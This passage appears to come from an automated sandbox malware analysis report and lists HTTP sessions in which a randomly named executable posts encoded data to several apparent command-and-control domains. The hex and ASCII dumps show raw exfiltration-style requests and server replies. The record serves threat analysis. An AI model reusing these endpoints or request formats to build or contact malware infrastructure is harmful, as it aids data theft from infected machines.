                                                      Data Ascii: Ebq4kd=VSFgwmtnFo8YbjeIOMu1wncJ4R5I/xXrmyDD8TA+jeWv8hVPh3vHEd+XvQtC8DPLjGrSQbL3TOWXJ49oxRkTdSH/qvbOhszGi7D/bBThykyRllmb7vxaDUrptheOWf6MRX9ztQpPoAi6SzWHagbAzmWoklmS8wy31NQHMxJ+fID4CrmQDjOQpuyJMY44nR2yJUU8FhPrUJZu8nij3g==
                                                      Jan 10, 2025 19:18:18.996052027 CET73INHTTP/1.1 405 Method Not Allowed
                                                      content-length: 0
                                                      connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.75431913.248.169.48806160C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 19:18:21.091377974 CET769OUTPOST /5onp/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 239
                                                      Host: www.bcg.services
                                                      Origin: http://www.bcg.services
                                                      Referer: http://www.bcg.services/5onp/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 45 62 71 34 6b 64 3d 56 53 46 67 77 6d 74 6e 46 6f 38 59 4a 53 4f 49 4c 71 6d 31 68 58 63 4f 38 68 35 49 74 78 57 69 6d 79 48 44 38 57 35 6a 6a 74 69 76 2f 44 4e 50 7a 6d 76 48 49 39 2b 58 33 41 74 62 32 6a 50 51 6a 47 58 73 51 65 4c 33 54 4f 43 58 4a 39 5a 6f 78 6d 77 51 66 43 48 39 69 50 62 41 76 4d 7a 47 69 37 44 2f 62 42 58 62 79 6b 71 52 6c 32 75 62 71 2b 78 56 41 55 72 6d 71 68 65 4f 53 66 36 49 52 58 39 46 74 55 6f 53 6f 44 61 36 53 79 6d 48 61 52 62 44 6b 57 58 74 36 56 6d 4d 7a 52 4c 46 33 2f 38 4b 4d 58 42 52 63 61 2f 76 4b 39 6e 79 5a 42 43 38 33 2f 4b 79 49 61 63 4f 77 33 72 48 4c 56 51 6b 49 44 37 4b 4c 2b 38 45 78 31 44 6e 68 56 77 64 78 34 63 43 30 4a 33 70 30 52 6a 56 71 78 36 45 57 72 38 3d
                                                      Data Ascii: Ebq4kd=VSFgwmtnFo8YJSOILqm1hXcO8h5ItxWimyHD8W5jjtiv/DNPzmvHI9+X3Atb2jPQjGXsQeL3TOCXJ9ZoxmwQfCH9iPbAvMzGi7D/bBXbykqRl2ubq+xVAUrmqheOSf6IRX9FtUoSoDa6SymHaRbDkWXt6VmMzRLF3/8KMXBRca/vK9nyZBC83/KyIacOw3rHLVQkID7KL+8Ex1DnhVwdx4cC0J3p0RjVqx6EWr8=
                                                      Jan 10, 2025 19:18:21.545516014 CET73INHTTP/1.1 405 Method Not Allowed
                                                      content-length: 0
                                                      connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.75432013.248.169.48806160C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 19:18:23.647077084 CET1782OUTPOST /5onp/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 1251
                                                      Host: www.bcg.services
                                                      Origin: http://www.bcg.services
                                                      Referer: http://www.bcg.services/5onp/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 45 62 71 34 6b 64 3d 56 53 46 67 77 6d 74 6e 46 6f 38 59 4a 53 4f 49 4c 71 6d 31 68 58 63 4f 38 68 35 49 74 78 57 69 6d 79 48 44 38 57 35 6a 6a 74 36 76 38 77 46 50 68 56 48 48 47 64 2b 58 37 67 74 65 32 6a 50 64 6a 43 37 67 51 65 50 4e 54 4d 36 58 4a 62 56 6f 6d 6a 63 51 57 43 48 39 67 50 62 4e 68 73 79 47 69 37 54 37 62 43 2f 62 79 6b 71 52 6c 33 2b 62 36 66 78 56 4d 30 72 70 74 68 65 61 57 66 36 67 52 57 56 56 74 55 6b 43 70 79 36 36 52 53 32 48 64 7a 6a 44 6d 32 58 76 37 56 6e 66 7a 51 33 65 33 2f 78 37 4d 58 64 37 63 61 48 76 61 36 69 57 45 7a 47 48 6f 64 72 75 42 38 56 70 6e 30 72 4d 4d 30 51 4d 4f 79 75 75 46 4f 31 78 36 6e 44 34 30 51 64 64 75 72 55 70 38 36 7a 69 6b 55 33 51 31 41 53 76 4e 4f 56 63 43 5a 6a 53 45 73 43 7a 66 38 47 43 64 6d 2f 44 46 68 7a 63 68 35 4b 4f 7a 62 5a 59 35 64 78 76 2b 58 52 5a 44 79 44 2b 6e 6c 72 49 6c 59 42 36 52 55 38 35 72 56 41 67 34 41 37 79 2b 33 79 51 56 37 78 6c 4e 73 75 61 6f 44 39 61 63 34 33 73 4f 70 49 78 38 45 41 32 31 55 53 79 32 61 36 7a 36 44 53 [TRUNCATED]
                                                      Data Ascii: Ebq4kd=VSFgwmtnFo8YJSOILqm1hXcO8h5ItxWimyHD8W5jjt6v8wFPhVHHGd+X7gte2jPdjC7gQePNTM6XJbVomjcQWCH9gPbNhsyGi7T7bC/bykqRl3+b6fxVM0rptheaWf6gRWVVtUkCpy66RS2HdzjDm2Xv7VnfzQ3e3/x7MXd7caHva6iWEzGHodruB8Vpn0rMM0QMOyuuFO1x6nD40QddurUp86zikU3Q1ASvNOVcCZjSEsCzf8GCdm/DFhzch5KOzbZY5dxv+XRZDyD+nlrIlYB6RU85rVAg4A7y+3yQV7xlNsuaoD9ac43sOpIx8EA21USy2a6z6DSSbtCMWvp8kAghkGK/HLvtXC4ARjrJgvcL+bS9wopaeIXYTfFVVOryULHhR8wrKnAu/+8/7qzFWuSX14FGZaXxr6kybUbZhdftw+2QDa2jGCQe4bxZELEBbFrbiXngr5B30Q7OUO+OfJCS6CyLC7W27UENJ1nIWYiRI2oCMcimkxsiqUUR+Vco55plJNGOXirIedLPA41vsY19Zzj+3SIIzG0KVvXn2zBJL6EvHIqAJSigXulLYGYSaENtG8nh+UczUUzea5YhXp3egM2RfbAbheh9KV6zQPXndJYSHS+wi5uJKBt87bbj/UFxHT72R3QJir11CczyHcFyYfTSC1yk64WLp9CblUnEz6dfZICgw6mewxBDzzIHXOnOn5mTdFPgMrt3q3dl6ptcolnjWcrTKH0cC6x4MavesuXAQdMu5tlHcr8ZqNRPzoxb7KgwqsxkpJo56iHIkDdet/8Qzd0+XJp4PzIQu4FCXHCFbQg46hHaFPwzT0z+8Prn/6k42cbA5+EnaX9TBR3JuPE0CKZUaz49JzMHjBT9p1tFxZ9YPWTHOaNhbGyBv6X4WlUUBx5di/4nRYcqP9ZCrQCZ0WnZy7li5ucipyqlwT5CZCi2II/sy1gRktQnzEKLMiu7rLlBZRu+h0VCH4oPkCrXTiMPaOi9cZCnrBrUd [TRUNCATED]
                                                      Jan 10, 2025 19:18:24.112307072 CET73INHTTP/1.1 405 Method Not Allowed
                                                      content-length: 0
                                                      connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.75432113.248.169.48806160C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 19:18:26.200822115 CET485OUTGET /5onp/?Ebq4kd=YQtAzQFhELh+NSSoDqDomWI7hzIl6D7m8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+VQ7bztTOkaWbq6GbSDD5gGudwG2s7dN0Aj/drkK6Y9amBXkHtwtBoxSc&zNH=npZPFHp HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.bcg.services
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Jan 10, 2025 19:18:32.736599922 CET395INHTTP/1.1 200 OK
                                                      content-type: text/html
                                                      date: Fri, 10 Jan 2025 18:18:32 GMT
                                                      content-length: 274
                                                      connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 45 62 71 34 6b 64 3d 59 51 74 41 7a 51 46 68 45 4c 68 2b 4e 53 53 6f 44 71 44 6f 6d 57 49 37 68 7a 49 6c 36 44 37 6d 38 69 48 61 34 57 31 34 73 2f 6a 31 38 78 78 30 75 44 79 38 4d 59 57 48 30 42 39 2f 79 77 33 58 71 44 4c 5a 63 6f 36 71 57 70 36 74 48 61 78 38 78 79 73 2b 56 51 37 62 7a 74 54 4f 6b 61 57 62 71 36 47 62 53 44 44 35 67 47 75 64 77 47 32 73 37 64 4e 30 41 6a 2f 64 72 6b 4b 36 59 39 61 6d 42 58 6b 48 74 77 74 42 6f 78 53 63 26 7a 4e 48 3d 6e 70 5a 50 46 48 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Ebq4kd=YQtAzQFhELh+NSSoDqDomWI7hzIl6D7m8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+VQ7bztTOkaWbq6GbSDD5gGudwG2s7dN0Aj/drkK6Y9amBXkHtwtBoxSc&zNH=npZPFHp"}</script></head></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.754322154.23.178.231806160C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 19:18:54.672643900 CET740OUTPOST /bsyy/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 219
                                                      Host: www.43kdd.top
                                                      Origin: http://www.43kdd.top
                                                      Referer: http://www.43kdd.top/bsyy/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 45 62 71 34 6b 64 3d 39 2f 2b 4d 78 65 50 75 42 70 32 68 50 6c 55 34 79 33 69 4a 59 4b 51 42 54 75 74 6b 79 45 77 34 6f 48 62 45 45 71 74 57 4d 69 56 38 64 4f 73 52 31 39 75 6f 4d 4b 70 43 75 66 70 59 45 48 54 69 79 41 4f 72 4d 76 5a 65 57 44 77 34 6a 61 52 73 37 48 54 67 7a 53 61 52 36 6c 37 54 38 71 39 6e 2b 57 7a 5a 35 76 44 51 30 6d 53 72 65 49 42 6d 55 6b 34 4e 46 41 68 71 7a 57 67 7a 69 44 78 58 45 52 30 74 55 54 4b 34 4f 50 30 4d 2f 36 37 63 77 7a 4f 43 6e 66 2f 36 7a 34 5a 4b 6f 70 78 45 48 54 36 70 74 64 65 72 6a 6d 63 4e 78 62 33 6b 31 54 4b 62 78 48 69 78 6f 42 53 5a 4e 44 56 48 34 62 72 54 71 41 4c 54 52 54 59 67 30 6c 69 43 54 41 3d 3d
                                                      Data Ascii: Ebq4kd=9/+MxePuBp2hPlU4y3iJYKQBTutkyEw4oHbEEqtWMiV8dOsR19uoMKpCufpYEHTiyAOrMvZeWDw4jaRs7HTgzSaR6l7T8q9n+WzZ5vDQ0mSreIBmUk4NFAhqzWgziDxXER0tUTK4OP0M/67cwzOCnf/6z4ZKopxEHT6ptderjmcNxb3k1TKbxHixoBSZNDVH4brTqALTRTYg0liCTA==
                                                      Jan 10, 2025 19:18:55.453870058 CET312INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Fri, 10 Jan 2025 18:18:55 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 148
                                                      Connection: close
                                                      ETag: "67811756-94"
                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.754323154.23.178.231806160C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 19:18:57.325619936 CET760OUTPOST /bsyy/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 239
                                                      Host: www.43kdd.top
                                                      Origin: http://www.43kdd.top
                                                      Referer: http://www.43kdd.top/bsyy/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 45 62 71 34 6b 64 3d 39 2f 2b 4d 78 65 50 75 42 70 32 68 4f 46 45 34 2f 32 69 4a 4a 71 51 4f 63 4f 74 6b 34 6b 78 2f 6f 48 58 45 45 72 6f 4e 4d 33 6c 38 65 75 38 52 32 38 75 6f 4c 4b 70 43 68 2f 70 6e 4b 6e 54 72 79 41 44 63 4d 76 31 65 57 48 59 34 6a 66 74 73 6e 6c 37 6a 68 79 61 66 38 6c 37 52 68 36 39 6e 2b 57 7a 5a 35 76 57 31 30 6d 61 72 65 34 52 6d 56 46 34 4b 49 67 68 74 32 57 67 7a 6d 44 78 54 45 52 30 44 55 58 43 57 4f 4b 77 4d 2f 37 72 63 31 79 4f 46 74 66 2f 67 38 59 59 2f 68 73 6f 41 47 44 69 51 30 4f 36 42 73 32 31 74 77 74 32 47 76 78 47 33 76 57 61 4b 73 44 32 76 61 6c 49 79 36 61 76 4c 6e 69 2f 79 4f 6b 39 4b 35 33 44 47 46 30 32 61 32 65 67 6f 43 49 67 41 34 46 4d 37 42 78 6f 63 5a 6d 45 3d
                                                      Data Ascii: Ebq4kd=9/+MxePuBp2hOFE4/2iJJqQOcOtk4kx/oHXEEroNM3l8eu8R28uoLKpCh/pnKnTryADcMv1eWHY4jftsnl7jhyaf8l7Rh69n+WzZ5vW10mare4RmVF4KIght2WgzmDxTER0DUXCWOKwM/7rc1yOFtf/g8YY/hsoAGDiQ0O6Bs21twt2GvxG3vWaKsD2valIy6avLni/yOk9K53DGF02a2egoCIgA4FM7BxocZmE=
                                                      Jan 10, 2025 19:18:58.187635899 CET312INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Fri, 10 Jan 2025 18:18:58 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 148
                                                      Connection: close
                                                      ETag: "67811756-94"
                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.754324154.23.178.231806160C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 19:18:59.882857084 CET1773OUTPOST /bsyy/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 1251
                                                      Host: www.43kdd.top
                                                      Origin: http://www.43kdd.top
                                                      Referer: http://www.43kdd.top/bsyy/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 45 62 71 34 6b 64 3d 39 2f 2b 4d 78 65 50 75 42 70 32 68 4f 46 45 34 2f 32 69 4a 4a 71 51 4f 63 4f 74 6b 34 6b 78 2f 6f 48 58 45 45 72 6f 4e 4d 33 74 38 64 64 6b 52 30 66 47 6f 4b 4b 70 43 6f 66 70 63 4b 6e 53 37 79 44 7a 59 4d 76 70 6f 57 42 63 34 69 35 35 73 72 45 37 6a 72 79 61 66 78 46 37 53 38 71 38 6a 2b 58 66 64 35 76 47 31 30 6d 61 72 65 36 5a 6d 57 55 34 4b 62 77 68 71 7a 57 67 33 69 44 78 33 45 52 38 31 55 58 48 6a 4e 35 34 4d 2f 61 62 63 33 67 6d 46 68 66 2f 2b 39 59 59 6e 68 73 73 50 47 44 2b 79 30 50 4f 72 73 31 56 74 78 38 50 35 7a 43 79 68 30 6e 61 69 74 6a 6d 71 50 6d 67 38 30 73 58 67 35 56 4b 56 43 6e 4e 38 68 46 76 76 42 77 79 65 76 49 4e 58 4b 73 63 7a 2b 79 4a 56 46 42 77 2b 45 7a 39 42 69 44 39 38 36 44 2f 4d 39 4c 7a 70 47 66 6e 47 33 33 55 4b 5a 6e 7a 64 43 71 6a 4c 74 6c 54 41 68 38 63 2f 73 51 79 7a 55 76 62 57 66 41 6d 62 41 62 68 31 56 56 51 36 4d 58 69 45 61 72 42 73 63 63 77 74 71 48 4c 42 6e 37 68 33 31 47 2b 61 61 36 52 37 78 73 68 4b 57 58 53 47 4c 45 52 59 58 61 78 [TRUNCATED]
                                                      Data Ascii: Ebq4kd=9/+MxePuBp2hOFE4/2iJJqQOcOtk4kx/oHXEEroNM3t8ddkR0fGoKKpCofpcKnS7yDzYMvpoWBc4i55srE7jryafxF7S8q8j+Xfd5vG10mare6ZmWU4KbwhqzWg3iDx3ER81UXHjN54M/abc3gmFhf/+9YYnhssPGD+y0POrs1Vtx8P5zCyh0naitjmqPmg80sXg5VKVCnN8hFvvBwyevINXKscz+yJVFBw+Ez9BiD986D/M9LzpGfnG33UKZnzdCqjLtlTAh8c/sQyzUvbWfAmbAbh1VVQ6MXiEarBsccwtqHLBn7h31G+aa6R7xshKWXSGLERYXaxC6vXwU86NN96RSko7nRrun9iQc2RLRSQmR6I5iHSGXCrZ3B2xFqkdf7/6WbcLrlkcAh4OR8keTDrqZ/aIIcPp5f3WZFWfZfQAgCqunSUIMPeTR4cUhnPt1MZqSmKkjPiEva/nrDkF2xG5sCUTUPOzzrj9teWZKNeBAQOY70gKJ+Oo7WxDz87mra99CS+l6cIApKhW8V1XfDrkJzBD09CZbnogqkYYfkv42elyh3edsfKb/O7Ed8C0ayra+KcqZF+N04ghYZTL6+1RquiKCyV5SRvaPx1c2le8pfgqymGYJVAHEslCgsGFSowCOZg3nYmIAElgdClaF4LkAA9L9PK/EaBfZecq0USBMjwPtLUUOntFJrZQCJI6KPim7sYdA5oaIiRStiBM5fwR1376OITNEGv2QH+DjqxsJzLlJ8hbfno4YbZOg5iKViVSlv/ElM9RApS0BljvfxeEeVndimM1MZWTHTf0GKKC5stOOPGSQzh7hqt24cD4Q1KsQhQEnvYmhQOaf9j3+cKn3VHHDBC8tSJE/6cen0YkW6HGom7OdPpaWxWB2cF7YilSQazaZ0S0MYqOF+BUzPV5gs6sbu899cQ9N5yI6IkSb2GH1qvddhP+yD9Va+jS0oACyAFqu/jssbJNqGvD3eYFLIIk9ZR+s0YJsqnM9/a2Y [TRUNCATED]
                                                      Jan 10, 2025 19:19:00.777610064 CET312INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Fri, 10 Jan 2025 18:19:00 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 148
                                                      Connection: close
                                                      ETag: "67811756-94"
                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.754325154.23.178.231806160C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 19:19:02.425019979 CET482OUTGET /bsyy/?zNH=npZPFHp&Ebq4kd=w9Wsyrfddra1GxcU+lvvJ4oQD8tz6DR/pSTnVJEXbHEmdfQx+6bPNdVPoslsCSigyUnMPNoyb3wBtIJwqnPVsz+Ro0OM8Jd88jKv7OGJqHGxaYpNVHYIOGV13jdXqVR/FDBUfHDkP5ob HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.43kdd.top
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Jan 10, 2025 19:19:03.329010010 CET312INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Fri, 10 Jan 2025 18:19:03 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 148
                                                      Connection: close
                                                      ETag: "67811756-94"
                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.754326130.185.109.77806160C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 19:19:08.400428057 CET758OUTPOST /cv1w/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 219
                                                      Host: www.lgdiamonds.info
                                                      Origin: http://www.lgdiamonds.info
                                                      Referer: http://www.lgdiamonds.info/cv1w/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 45 62 71 34 6b 64 3d 48 4b 35 36 44 30 5a 68 2f 66 2b 48 6d 6b 4f 63 6a 50 53 2b 4c 4f 52 48 72 49 30 6c 6a 6d 4a 64 61 59 49 53 6d 31 7a 59 34 56 35 67 30 56 44 69 71 55 67 53 66 34 75 76 4b 35 68 57 5a 70 65 39 6f 66 47 78 58 50 6f 44 69 34 43 49 70 70 4c 78 68 7a 62 4b 6c 42 72 78 58 72 75 39 57 54 76 64 33 65 36 64 45 55 62 47 2b 51 6e 2f 76 69 39 61 50 53 77 44 69 41 52 6a 6a 2b 78 76 77 75 48 4f 53 4f 66 39 37 66 59 77 43 4e 44 77 76 6a 2f 53 79 58 46 6c 2b 2b 6b 34 34 75 4f 59 5a 35 44 6c 44 2f 43 75 63 49 43 5a 72 72 36 79 69 43 4e 58 6f 36 45 65 76 59 6c 43 44 62 62 79 73 4b 69 35 71 30 33 67 5a 74 4e 73 75 38 4e 72 78 54 30 6b 76 67 3d 3d
                                                      Data Ascii: Ebq4kd=HK56D0Zh/f+HmkOcjPS+LORHrI0ljmJdaYISm1zY4V5g0VDiqUgSf4uvK5hWZpe9ofGxXPoDi4CIppLxhzbKlBrxXru9WTvd3e6dEUbG+Qn/vi9aPSwDiARjj+xvwuHOSOf97fYwCNDwvj/SyXFl++k44uOYZ5DlD/CucICZrr6yiCNXo6EevYlCDbbysKi5q03gZtNsu8NrxT0kvg==
                                                      Jan 10, 2025 19:19:08.999353886 CET322INHTTP/1.1 404 Not Found
                                                      Server: nginx/1.6.2
                                                      Date: Fri, 10 Jan 2025 18:19:08 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.754327130.185.109.77806160C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe
